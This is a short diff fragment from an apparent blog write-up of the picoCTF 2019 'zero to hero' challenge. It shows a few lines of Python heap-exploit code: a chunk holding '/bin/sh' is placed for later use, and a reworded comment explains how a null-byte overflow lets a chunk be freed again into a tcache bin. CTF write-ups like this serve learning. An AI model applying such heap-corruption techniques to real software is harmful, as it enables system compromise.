farazsth98/farazsth98.github.io/_posts/2019-10-12-picoctf-2019-zero-to-hero.markdown

 # Also put in /bin/sh\x00 into it for later use
 add(0x58, '/bin/sh\x00' + 'A'*0x50) # Chunk A

-# The 0x180 chunk's size is now actually 0x100 (due to null byte overflow), so we can free it again
+# The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)
+# This means we can free it again immediately
 free(1) # Goes into 0xf0 tcache bin
 ```